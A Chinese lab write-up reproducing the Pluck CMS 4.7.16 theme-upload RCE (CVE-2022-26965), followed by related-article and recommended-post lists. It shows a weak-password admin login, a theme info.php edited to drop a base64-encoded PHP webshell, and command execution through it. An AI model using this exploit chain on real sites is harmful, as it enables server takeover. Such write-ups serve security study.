漏洞简介

Pluck CMS 4.7.16 版本的远程代码执行(RCE)漏洞(CVE-2022-26965)。

该漏洞允许经过身份验证的用户通过 /admin.php?action=themeinstall 的主题上传功能执行任意代码。

漏洞细节

在 Pluck CMS 的管理界面中,管理员可以上传主题文件。

CMS在处理主题包时未隔离或限制文件写入操作,导致恶意代码被直接写入Web目录并执行。

漏洞利用

获取管理员权限:攻击者需要首先获取管理员账户的访问权限。

上传恶意主题:利用 /admin.php?action=themeinstall 页面上传包含恶意代码的主题文件。

执行代码:通过访问上传的恶意文件,攻击者可以在服务器上执行任意代码

漏洞复现

先利用弱口令admin登录

选择上传主题的功能点

找到上传点

然后利用cms主题构造木马,在github找到主题

https://github.com/billcreswell/redline-theme

下载压缩包 修改info.php文件

修改内容

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));

?>

file_put_contents() 函数:把一个字符串写入文件中。

base64_decode()对encoded_data进行解码,返回原始数据。

base64解码  PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg== 得到<?php system($_GET[1]);?>

然后上传压缩包

然后访问/shell.php?1=ls

进行命令执行

春秋云镜的靶场好像无法用蚁剑连接,直接传参命令执行就可以了

Pluck-CMS-Pluck-4.7.16 远程代码执行漏洞(CVE-2022-26965)的更多相关文章

  1. PHPMailer < 5.2.18 远程代码执行漏洞(CVE-2016-10033)

    PHPMailer < 5.2.18 Remote Code Execution 本文将简单展示一下PHPMailer远程代码执行漏洞(CVE-2016-10033)的利用过程,使用的是别人已经 ...

  2. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

  3. Office CVE-2017-8570远程代码执行漏洞复现

    实验环境 操作机:Kali Linux IP:172.16.11.2 目标机:windows7 x64 IP:172.16.12.2 实验目的 掌握漏洞的利用方法 实验工具 Metaspliot:它是 ...

  4. CVE-2017-6920 Drupal远程代码执行漏洞学习

     1.背景介绍: CVE-2017-6920是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core. Drupal介绍:Drupal 是一个由 ...

  5. vBulletin 5.x 版本通杀远程代码执行漏洞复现

    漏洞介绍 vBulletin中存在一个文件包含问题,可使恶意访问者包含来自 vBulletin 服务器的文件并且执行任意 PHP 代码.未经验证的恶意访问者可通过向index.php发出包含 rout ...

  6. IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现

    CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...

  7. 代码审计之CVE-2017-6920 Drupal远程代码执行漏洞学习

     1.背景介绍: CVE-2017-6920是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core. Drupal介绍:Drupal 是一个由 ...

  8. Struts2-057远程代码执行漏洞(s2-057/CVE-2018-11776)复现

    参考了大佬的链接:https://github.com/jas502n/St2-057 00x01前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用 ...

  9. Microsoft Exchange远程代码执行漏洞(CVE-2020-16875)

    Microsoft Exchange远程代码执行漏洞(CVE-2020-16875) 漏洞信息: 由于对cmdlet参数的验证不正确,Microsoft Exchange服务器中存在一个远程执行代码漏 ...

  10. Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

    影响版本 Drupal 6.x,7.x,8.x Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞 脚本检测

随机推荐

  1. JavaScript Quine揭秘:如何让程序输出自身源代码?

    介绍 如何写一段javascript程序,输出自身的源代码?这个问题非常有意思,大家不妨先尝试一下,反正在尝试了半个小时之后,我果断放弃了. 这种能输出自身的程序在英文里被称为quine. 准备知识 ...

  2. Cursor 网页版来了,这下拉屎时也能工作了

    大家好,我是程序员鱼皮.几天前,Cursor 官方宣布推出了网页版 AI 代理,手机上也能用,可以让 AI 帮忙回答问题.编写代码.好家伙,这下我们程序员真的可以随时随地工作了??? 虽然网上吹得天花 ...

  3. JS循环遍历对象,获取key:value

    https://blog.csdn.net/lyn1772671980/article/details/79093459 let obj = {        'a':'aa',        'b' ...

  4. 前端开发系列082-Node篇之PRPL

    本文主要介绍Node提供的交互式运行环境REPL,包括常见操作以及基础命令等内容. 一.REPL介绍 在Node.js中,提供了一个交互式的运行环境-REPL(Read-Eval-Print-Loop ...

  5. leetcode 240 搜索二维矩阵

    简介 一时半会儿没啥思路. 官方那种 移动指针的思路挺不错的. code class Solution { public boolean searchMatrix(int[][] matrix, in ...

  6. 解决EasyExcel读取日期为1905年

    问题 用EasyExcel导入Excel的时候读取日期出现问题,部分日期读取变成1905年 Excel中的日期格式比较特别,是yyyy.MM格式的,和数字类型的小数非常相似 和Excel中的日期对不上 ...

  7. HF Papers 直播| AI for Science 专场

    AIGC热点大赛# 由 Hugging Face × OpenMMLab × ModelScope × 知乎 × 机智流等 联合发起的[AI Insight Talk]系列直播活动第三场即将开始! A ...

  8. ETL数据集成丨为什么没有做好ETL的BI工具最终都会失败?

    随着数字化转型,企业越来越重视数据的价值和利用.商业智能(Business Intelligence,BI)作为一种数据分析和决策支持的重要工具,被广泛应用于各行各业.然而,对于BI项目的成功实施,E ...

  9. Forward: Turn off Filevault on macOS

    Turn off Filevault on macOS: https://kane.mx/posts/2021/turn-off-filevault-on-macosx/ Oct 31, 2021, ...

  10. 实用Linux命令记录

    ss统计网络连接情况 [root@Dev-8.8.8.8 ~]# ss -tan |awk 'NR>1 {++sum[$1]} END{for(i in sum) print i"\t ...